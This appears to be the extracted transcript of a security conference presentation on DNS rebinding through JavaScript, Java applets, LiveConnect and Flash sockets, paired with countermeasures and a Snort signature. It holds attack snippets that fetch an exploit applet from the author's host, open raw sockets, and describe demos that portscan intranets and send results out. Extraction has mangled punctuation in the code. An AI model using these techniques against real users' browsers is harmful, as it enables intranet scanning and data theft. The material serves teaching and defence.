DNS Rebinding and Socket API - PowerPoint PPT Presentation

1 / 40
About This Presentation
Title:

DNS Rebinding and Socket API

Description:

Social engineering with using E-mails, BBS, comments on blogs ... Sun Microsystems implements DNS Pinning on Java as a countermeasure to DNS ... – PowerPoint PPT presentation

Number of Views:638
Avg rating:3.0/5.0
Slides: 41
Provided by: ping1
Category:
Tags: api | dns | bbs | rebinding | socket | sun

less

Transcript and Presenter's Notes

Title: DNS Rebinding and Socket API


1
DNS Rebinding and Socket API Kanatoko erz.net http//www.jumperz.net/
2
DNS Rebinding Overview(1)
  • One of the attack vectors
  • Not a bug of a certain software
  • All kinds of Operating Systems may be affected
  • Windows, Linux, MacOSX
  • There are no patches
  • Occurs in the relationship with Web servers, DNS
    servers, proxy servers
  • Real threat
  • Maybe your system is vulnerable

3
DNS Rebinding Overview(2)
  • Eve controls the web browser of Alice
  • and make it do something
  • Stealing information
  • Make Alice attack
  • Not a direct attack against the servers
  • Not an attack against the DNS servers

4
How the attack is deployed?
  • Deployed when Alice visits Eves trap page
  • Same as XSS, CSRF
  • Unawares
  • Social engineering with using E-mails, BBS,
    comments on blogs
  • It is difficult to find out whether the page is a
    trap or not
  • Sometimes the hacked web sites ( like famous
    companies) are used to deploy the attack

5
Technologies used in DNS Rebinding
  • JavaScript
  • Java
  • FLASH
  • Malicious codes starts running on the Alices
    browser
  • But there are security constraints
  • For example Cannot read from or write to the
    local files
  • Each of these technologies has a network access
    function

6
When Alice visits Eves page(1)
  • Eves malicious code starts running and accesses
    over the network
  • JavaScript
  • Get resources using XMLHttpRequest,SCRIPT
    tag,IMG tag(HTTP)
  • FLASH
  • URLLoader(HTTP),
  • Socket(TCP)
  • Java
  • URLConnection(HTTP),
  • Socket(TCP)
  • DatagramSocket(UDP)

7
When Alice visits Eves page(2)
  • Of course there are security constraints on the
    network access functions
  • Can access only to the origin host on that Java
    Applets(.class,.zip,.jar), FLASH SWF files, web
    pages are located
  • Known as Same Origin Policy

8
DNS Rebinding attack vector(1)
  • Eve owns the top level domain eve.tld
  • So Eve can control the DNS server of eve.tld
  • Eve runs a web server at 218.45.25.5 and
    locates the malicious codes there
  • Eve binds 218.45.25.5 as the address of the
    hostname www.eve.tld. Eve sets very short value
    ( for example, 8 seconds ) as a TTL value of the
    DNS record
  • Alice tries to access to the Eves trap page
    located at www.eve.tld
  • The first name resolution is done by Alice and
    218.45.25.5 is returned from the Eves DNS
    server.
  • Alices browser loads the Eve s trap page.
  • Soon TTL expires
  • At the same time, Eve changes the configuration
    of the DNS server and binds 127.0.0.1 as the
    address of the hostname www.eve.tld

9
DNS Rebinding attack vector(2)
  • The Eves malicious code on the Alices browser
    tries to access to www.eve.tld
  • The second name resolution is done by Alice. This
    time 127.0.0.1 is returned from the Eves DNS
    server.
  • The code accesses to 127.0.0.1
  • Though 127.0.0.1 is not an Eves host, the code
    is allowed to access to 127.0.0.1 because the
    hostname is www.eve.tld ( same origin )
  • As the example above shows, DNS Rebinding enables
    Eve to access to the addresses like 127.0.0.1
    which of course should not be allowed to access

10
What is DNS Pinning?
  • Only FLASH is vulnerable to the DNS Rebinding
    attack vector explained in the previous page
  • The other two technologies ( JavaScript and Java
    ) caches the DNS information in their own ways
  • TTL does not expire. This behavior violates the
    DNS protocol
  • It is called as DNS Pinning
  • Sun Microsystems implements DNS Pinning on Java
    as a countermeasure to DNS Rebinding ( or DNS
    Spoofing ).
  • On the other hand, the browser vendors(
    Microsoft, Mozilla.org and Opera ) seem that they
    are not so conscious of DNS Rebinding
  • Eve needs to make Alice discard the cached DNS
    information to execute DNS Rebinding

11
What is Anti-DNS Pinning(1)
  • Make Alice discard the pinned DNS information
  • Can be applied only to JavaScript
  • FLASH does not pin DNS at all
  • Java never discards the pinned DNS information.
    Java is immune to Anti-DNS Pinning
  • Martin Johns notified this issue to the security
    community at Aug 2006
  • http//shampoo.antville.org/stories/1451301/

12
What is Anti-DNS Pinning(2)
  • If an access to the server fails after an
    appropriate period has elapsed, the browser
    discards the pinned DNS information and executes
    the second name resolution
  • Change the firewall rule
  • Shut down the web server
  • Make Alice access to the closed port
  • (for example- http//example.com81/)
  • Anti-DNS Pinning make Eve possible to force Alice
    execute the second name resolution. Eve can
    launch DNS Rebinding as a result
  • Anti-DNS Pinning is a step used in DNS Rebinding
    (against JavaScript)

13
DNS Rebinding against JavaScript
  • XMLHttpRequest is mainly used
  • Get information from the web servers to those Eve
    cannot access without DNS Rebinding, and send it
    to the Eves host
  • The targets are only web servers because HTTP is
    used in the communication
  • It is not Cross Domain but Cross Address. So
    the HTTP requests do not contain Cookies and
    Authorization headers of the target web page
  • For this reason it is not used in CSRF.
  • For the same reason it means almost nothing to
    force Alice to get information from the Internet.
    So the Intranet is the main target
  • There are some exceptions. If an address-based
    authentication ( for example The countermeasure
    of Universal PDF XSS issue) exists, Eve may use
    DNS Rebinding for get information via the Alices
    browser
  • Stolen information is sent to the Eves another
    host. It is quite easy for Eve because there are
    no Same Origin Policy about sending data with
    JavaScript

14
DemoDNS Rebinding on JavaScript
  • http//www.jumperz.net/index.php?i2a1b7
  • Get information from the Intranet and send it to
    www.jumperz.net
  • I was skeptical about whether DNS Rebinding is a
    real threat, when I read the Martins article for
    the first time
  • It took me 20 hours to make this demo to work
    stably
  • Web application(JSP), DNS server(djbdns) and
    JavaScript on the browser are used
  • Uses closed port method to launch Anti-DNS
    Pinning
  • Special Thanks to Kawa from Team Tidori

15
JavaScript on each browser
  • On Firefox, the code needs to wait for about 2
    minutes to launch Anti-DNS Pinning
  • On IE6 and Opera, the code only needs to wait for
    the TTL value( a few seconds )
  • IE7- not checked yet

16
Countermeasures for DNS Rebinding on JavaScript
  • Require authentication for HTTP accesses
  • Basic authentication is enough
  • Disabling JavaScript is perfect
  • It is not a threat because easy and good
    countermeasures exist
  • Of course the default usernames/passwords ( of
    ADSL routers, for example ) need to be changed

17
DNS Rebinding on FLASH and Java(1)
  • Socket APIs available
  • The Eves code can implement any TCP based
    protocol
  • It is far more dangerous than DNS Rebinding on
    JavaScript
  • To any hosts on the Internet and the Intranet
  • With Any TCP based protocol
  • From Alices browser
  • Portscan
  • SPAM e-mails
  • Exploiting known vulnerabilities
  • File sharing network
  • DoS attacks
  • Exploiting address based authentications

18
DNS Rebinding on FLASH and Java(2)
  • Eve can use the Alices browser as a TCP( or UDP
    ) proxy because the Eves malicious code can send
    and receive data in anytime using another host
    like www2.eve.tld even on a DNS rebound
    situation
  • The Alices system ( or network ) could be both a
    victim and an assailant

19
DNS Rebinding on Java(1)
  • Suns Java Virtual Machine
  • The code runs under a security restriction called
    Sandbox
  • The host that is allowed to communicate over the
    network with Java applet is the origin of the
    applet. It is not the origin of the web page
  • The Socket class(TCP) and the DatagramSocket(UDP)
    class are available
  • Binary data can be sent and received
  • Caches the DNS record until the termination of
    the process ( forever ). It is a very strong DNS
    Pinning
  • Apparently violates the DNS protocol. It makes
    trouble when you implement some server
    applications like SMTP server with using Java
  • The JVM parameter networkaddress.cache.ttl
    enables you to control this behavior. But still
    in this case the TTL value of the DNS record is
    ignored
  • The networkaddress.cache.ttl parameter cannot
    be set from the Java applet

20
DNS Rebinding on Java(2)
  • There was a related issue
  • http//www.cs.princeton.edu/sip/news/sun-02-22-96
    .html
  • There are no configurations like Disable sockets
    on the Java applets
  • We cannot remove the Socket class from Java
    because it is also used in the download process
    of the applet
  • Java downloads the applet by itself. Not relies
    on the browser
  • So the cache of the browser is not used when the
    applet is downloaded by Java
  • Java does name resolution for downloading
  • The point is that the Java does name resolution
    BEFORE the applet has downloaded
  • And the result of the name resolution will be
    cached forever

21
DNS Rebinding on Java(3)
  • If the Eves DNS server returns the fake IP
    address as a result of the Alices name
    resolution, the Java applet will not be
    downloaded and the attack will fail
  • If the Eves DNS server returns a correct IP
    address as a result of the Alices name
    resolution, the Java applet will be downloaded
    properly. But Eve cannot rebind the IP address
    because the Alices Java caches the result of the
    first name resolution forever. The attack will
    fail as a result
  • In both case the attack will fail
  • Only the users behind proxy servers are
    vulnerable
  • The business users in the cooperation network
    with the application proxy gateway are vulnerable
    than the home users with NAT

22
DNS Rebinding on Java(4)
  • Make the proxy server cache the Java applet
    before Java is activated

//make the proxy cache the applet var foo new
Image() foo.src http//12345.jumperz.net/explo
its/MTCPCApplet.class //wait for the TTL to
expire setTimeout( 'f1()', 1000 12 ) //add
the applet tag to the page function f1() var
base document.getElementById( "base" ) var str
'codebase"http//12345.jumperz.net/exploits/"'
''
'' base.innerHTML str
23
DNS Rebinding on Java(5)
  • The downloading of the Java applet is done by the
    proxy server though Java does a name resolution
    and a spoofed IP address is returned. The cache
    of the Java applet in the proxy server is
    returned to the Alices Java, and the Eves
    malicious code starts running successfully

- The request of the browser GET
/exploits/MTCPCApplet.class HTTP/1.0 Accept
/ Referer http//1190066223254.jumperz.net/expl
oits/ap3.jsp?address127.0.0.1 Accept-Language
ja User-Agent Mozilla/4.0 (compatible MSIE 6.0
Windows NT 5.0 .NET CLR 2.0.50727) Host
1190066223254.jumperz.net Cookie
JSESSIONIDC6D04DDABD28F3B0FACE61F9EA70B44A Connec
tion Keep-Alive - The request of the Java
applet GET /exploits/MTCPCApplet.class
HTTP/1.1 User-Agent Mozilla/4.0 (Windows 2000
5.0) Java/1.6.0_02 Host 1190066223254.jumperz.net
Accept text/html, image/gif, image/jpeg,
q.2, / q.2 Cookie JSESSIONIDC6D04DDABD28F3B
0FACE61F9EA70B44A Connection keep-alive
24
Demo DNS Rebinding on Java
  • http//www.jumperz.net/index.php?i2a1b10
  • Scan some ports and retrieve the banner from the
    server, and send the result to www.jumperz.net
  • Works on IE, Firefox, and Opera
  • Works only on users behind proxy

25
Countermeasures for DNS Rebinding on Java(1)
  • Disabling Java
  • Restrict the ports allowed to connect to with
    using personal firewalls ( for example only 80
    and 443 )
  • Require authentication for every protocol used on
    the Intranet
  • Patch known vulnerabilities
  • Use firewall to find and stop the outgoing
    attacks.( for example UDP 53 DoS )
  • It is not easy to find the malicious Java code on
    the gateway or IDS or IPS because the Java applet
    class file could be zipped into .zip and .jar
    files

26
Countermeasures for DNS Rebinding on Java(2)
  • Setup a JRE only for the Java applets and patch
    the SecurityManager class

public void checkConnect(String host, int port)
if (host null) throw new
NullPointerException("host can't be null")
host "127.0.0.2" if
(!host.startsWith("") host.indexOf('') !
-1) host "" host ""
if (port -1) checkPermission(new
SocketPermission(host,
SecurityConstants.SOCKET_RESOLVE_ACTION))
else checkPermission(new
SocketPermission(host""port,
SecurityConstants.SOCKET_CONNECT_ACTION))

27
DNS Rebinding on LiveConnect
  • Works only if both Java and JavaScript are
    enabled
  • One can write a Java code in a JavaScript code
  • var s new java.net.Socket( "www.jumperz.net",
    25 )
  • It is a part of the LiveConnect technology
  • Not supported on IE
  • Eve can send the malicious Java code to Alice
    before Java is activated
  • The users NOT behind proxy are also vulnerable
  • On the implementation of LiveConnect of Opera it
    seems that there are some bugs
  • Firefox is the most dangerous browser

28
Demo DNS Rebinding on LiveConnect
  • http//www.jumperz.net/index.php?i2a1b9
  • A collaboration of Martin Johns and me
  • http//shampoo.antville.org/stories/1566124/
  • Scan some ports and retrieve the banner from the
    server, and send the result to www.jumperz.net
  • Works on Firefox and Opera

29
Countermeasures for DNS Rebinding on LiveConnect
  • The same as those of Java

30
DNS Rebinding on FLASH(1)
  • The Socket class is available from ActionScript
    3.0
  • Can communicate with server using TCP layer
    protocol
  • Binary data can be sent and received
  • Works on Flash Player 9.0 or later
  • The host that is allowed to communicate over the
    network with FLASH is the origin of the FLASH
    .swf file. It is not the origin of the web page
  • FLASH does not implement DNS Pinning at all
  • The DNS information will be discarded after the
    TTL has elapsed
  • DNS Rebinding on FLASH is very easy
  • It is a threat that FLASH has added the Socket
    class because FLASH is one of the most widely
    used plugins. Many users enable FLASH on their
    browsers
  • There are no configurations like Disable sockets
    on FLASH

31
DNS Rebinding on FLASH(2)
  • An example code of the Socket class

private var sock1Socket private function
test1()void var sock1Socket new
Socket() sock1.addEventListener( Event.CONNECT,
onConnected ) sock1.connect( www.jumperz.net",
80 ) private function onConnected( eEvent
)void sock1.writeMultiByte( "GET /
HTTP/1.0\r\n\r\n", "ISO-8859-1" )
32
DNS Rebinding on FLASH(3)
  • Can connect only to ports over 1024 by default.
    This is a difference between FLASH and Java
  • Policy-loading is required to connect to ports
    under 1024. This is done by using a TCP-based
    original protocol
  • Policy-loading is done successfully under NAT
  • Eve could use port 443 for policy-loading
  • Detecting the network traffic of the
    policy-loading with IDS or IPS would have some
    meaning
  • An example signature ( Snort )
  • alert tcp HOME_NET any - EXTERNAL_NET any
    (msg"FLASH Socket policy-file-request"
    flowto_server,established content"
    request/" nocase )

33
DNS Rebinding on FLASH(4)
  • An example code of policy-loading and the traffic

//load policy using port 2 flash.system.Security
.loadPolicyFile( "xmlsocket//www.jumperz.net2"
) from client to server / from server to client version"1.0"? SYSTEM "http//www.macromedia.com/xml/dtds/cross-d
omain-policy.dtd" cess-from domain".jumperz.net" to-ports""
/
34
Demo DNS Rebinding on FLASH
  • http//www.jumperz.net/index.php?i2a1b8
  • This demo notified the existence of the Socket
    class of FLASH to the security community
  • Works on Flash Player 9.0 or later
  • Cannot scan ports under 1024 in non-NAT network
    because of the FLASH policy-loading mechanism
  • Scan some ports and retrieve the banner from the
    server, and send the result to www.jumperz.net

35
Countermeasures for DNS Rebinding on FLASH(1)
  • Disabling FLASH
  • The same as those of Java

36
Countermeasures for DNS Rebinding on FLASH(2)
  • Patch .dll or .ocx files
  • Overwrite the call instruction to the connect
    winsock API
  • Almost no side effects ( you still can see
    YouTube )

BEFORE
AFTER
37
Dynamic DNS and DNS Pinning
  • At some point an IP address is used by the Bobs
    web server
  • Alice visits the Bobs web site
  • Bobs connection has lost and he reconnect to the
    Internet, and the IP address of the Bobs server
    has changed
  • Soon Bob rebinds the new IP address with the
    Bobs hostname with using some Dynamic DNS system
  • Eve gets Bobs old IP address ( bound by ISP,
    with DHCP )
  • If Alice has pinned the DNS information of the
    Bobs hostname, the Alices HTTP requests will be
    sent to the Eves web server. Of course those
    should be sent to the Bobs web server
  • In this case Eve can get the Alices session id
    from the cookie and can hijack her session
  • This will happen to every web sites because every
    service based on DNS is dynamic in long term
  • It means that DNS Pinning may cause another
    security problem

38
Countermeasures on all 3 technologies
  • Monitoring DNS packets (Is there any good system
    for this purpose ?)
  • Change of IP address in a short period
  • Especially from global IP to private IP
  • It is hard to find DNS Rebinding attacks from the
    TTL values because very short TTL values are
    widely used
  • The plugins of Firefox is useful ( NoScript,
    FlashBlock etc)

39
Other things
  • DNS Rebinding is a really complicated problem
  • Web browsers
  • Plugins
  • DNS
  • Proxies
  • Real threat
  • We cannot find attacks if it is not prepared to
    find
  • Do we need some detection system for DNS
    Rebinding, as a first step?
  • We need more flexible configurations on the
    browsers
  • Disable/Enable Sockets on Java/FLASH
  • IP address has changed notification dialogs

40
Thank you!
  • Any questions?
Write a Comment
User Comments (0)
About PowerShow.com